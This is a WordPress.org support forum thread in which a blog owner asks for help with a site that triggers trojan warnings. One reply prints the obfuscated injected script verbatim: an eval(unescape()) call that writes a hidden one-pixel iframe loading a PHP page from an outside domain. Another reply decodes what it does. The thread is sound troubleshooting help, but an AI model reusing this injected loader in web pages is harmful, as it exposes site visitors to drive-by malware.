Help! Site has Virus/Trojan! | WordPress.org

exist2009
(@exist2009)

14 years, 1 month ago

Someone who visited my blog recently informed me that he got a trojan warning when opening the site up. I’ve been having some trouble with the dashboard recently (often, it opens, then the page goes completely blank and say “Done” in the lower left hand corner) so perhaps the trojan is the culprit. However, I have absolutely no idea how to go about finding this trojan and what the file might look like…Any suggestions would be seriously appreciated!

Here’s my site (is it be risky to visit at this point? Should I take it down until I can get this figured out?):
http://powai.info

My blog is updated and using WordPress 2.9.2

Thanks for any help you might be able to provide.

Viewing 3 replies - 1 through 3 (of 3 total)

Samuel B
(@samboll)

14 years, 1 month ago

this code is at the bottom when you “view source”
<script language="javascript">eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%73%73%39%77%38%73%38%39%78%78%2E%6F%72%67%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B"))</script>

so you’ve definitely been hacked

http://codex.wordpress.org/FAQ_My_site_was_hacked

http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

http://ottodestruct.com/blog/2009/hacked-wordpress-backdoors/

ballinascreen
(@ballinascreen)

14 years, 1 month ago

Yep – translates to a 1×1 pixel iframe which then attempts to load content from a php script at iss9w8s89xx.org – however, the domain name no longer resolves or appears to be active.

jetcreates1980
(@jetcreates1980)

13 years, 7 months ago

I also have this problem with 2 of my websites:
http://www.afkesmerklap.nl
http://www.jetenjul.nl

I only do not get this Trojan message myself so I don’t know where I can find it.

Can somebody help me with this?

Thanks in advance,
Marjet

Viewing 3 replies - 1 through 3 (of 3 total)

The topic ‘Help! Site has Virus/Trojan!’ is closed to new replies.

Tags

trojan

In: Plugins
3 replies
4 participants
Last reply from: jetcreates1980
Last activity: 13 years, 7 months ago
Status: not resolved

Topics

Topics with no replies

Non-support topics

Resolved topics

Unresolved topics

All topics